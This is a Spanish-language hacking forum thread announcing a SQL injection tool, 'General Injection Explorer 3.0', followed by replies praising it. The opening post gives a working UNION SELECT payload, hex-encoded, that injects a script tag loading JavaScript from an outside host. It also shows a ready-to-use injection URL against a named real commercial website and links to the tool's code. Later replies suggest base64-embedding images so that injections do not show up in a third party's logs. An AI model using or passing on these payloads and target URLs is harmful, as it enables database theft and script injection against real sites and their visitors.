General Injection Explorer 3.0
by PonyMagic
[?] Que es?Basicamente es un explorador de bases de datos MySQL via SQLi, "incrustado" en la inyeccion.
[!] Que tiene la version 3.0?- Codeado desde 0.
- Bypasseo de "illegal operation", y limite de group_concat_max_len.
- Mejor manejo de CSS && DIVS.
- Peticiones realizadas con AJAX.
- Nueva forma de ver tablas, MUCHO mas ordenadas.
[?] Como se usa?
En una SQLi, unis otro select y marcas las columnas ( id=-1 union select 1,2,3,4,5 )
En un valor que printee (que se muestre en la web), simplemente copias y pegas el codigo de la GIE.
(0x3c736372697074207372633d22687474703a2f2f7669727475782e636f6d2e61722f4749452f5f2e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e)
Ejemplo:
adegasgalegas.es SQLi (http://www.adegasgalegas.es/en/html/comprar.php?id=-1%20UNION%20SELECT%200,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--)
adegasgalegas.es GIE SQLi (http://www.adegasgalegas.es/en/html/comprar.php?id=-1%20UNION%20SELECT%200,1,(0x3c736372697074207372633d22687474703a2f2f7669727475782e636f6d2e61722f4749452f5f2e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--)
(http://i45.tinypic.com/2e4lqtd.jpg)
Injeccion con General Injection Explorer 3.0
Luego, se navegan las bases de datos, usando ese "cuadradito" como un mini-phpmyadmin :P como se ve en el siguiente [.gif]:
(http://img692.imageshack.us/img692/9366/84930379.gif)
- Gracias a virtux por hostear, acá tienen el código y el link:
Link JS (http://virtux.com.ar/GIE/_.js)
Link Paste2 [Highlight] (http://paste2.org/p/558258)
Está super bueno, me gustó me gustó me gustó :D
PD:
Donde dice:
document.write("
background: url(
'http://www.diosdelared.com/blogs/themes/blackcyan/imagenes/bg.jpg'
) #000;z-index:1002;overflow: auto;}
"); // background
Podrías apuntar hacia otra web? xD ya que cuando se incluya esa imagen la referencia de la inyección se enviará a su web dejando en su log de acceso las inyecciones que alguien podría encontrar y utilizar con este script.
A mi me gustaría mucho si pudieras reemplazar el buffer de las imagenes con string en base64 y data/*; o simplemente hacerlo sin imagenes y evitar la dependencia de inclusiones externas.
gracias por el dato, lo voy a tener en cuenta!
si alguien tiene alguna critica "constructiva" o no :P
por favor que comente, asi la proxima queda mejor :)
Es la mejor herramienta para estas labores que he visto.
Tuviste una idea impresionante ;-) ;-) ;-)
Increíble ;-)
sisi!, esta muy buena, genial.
segui así
saludos
Grozo!!!
Ahora no necesitas conocimientos de mysql para hacer inyecciones :P
@WHK:
Te pregunto por ignorante...
Que es el buffer de imagen? Y que necesidad para que este cifrado?
Cita de: Vaati en 13 Diciembre 2009, 23:31 PM
Grozo!!!
Ahora no necesitas conocimientos de mysql para hacer inyecciones :P
@WHK:
Te pregunto por ignorante...
Que es el buffer de imagen? Y que necesidad para que este cifrado?
cifra la imagen en base64 y se la pasa al firefox pàra que la muestre :P Sin necesidad de sacarla de alguna web ;)
Citarcifra la imagen en base64
Más que cifrar, codificar
Cita de: kamsky en 14 Diciembre 2009, 11:21 AM
Citarcifra la imagen en base64
Más que cifrar, codificar
Toda la razón kamsky ;)
muy bueno xD aunque por el título pense que vulnerabas mysqli de php xDDD no se, me imagine las prepared statements o algo asi jaja
el concepto lo encontre genial.
Buen proyecto bro.
Saludos¡
me siento feliz al haberme registrado en esta comunidad, llegan sorprendentes aportes cada dia,DIOSSSSSSSSSSSSSSSSSSSSSSSSS
excelente trabajo ;-)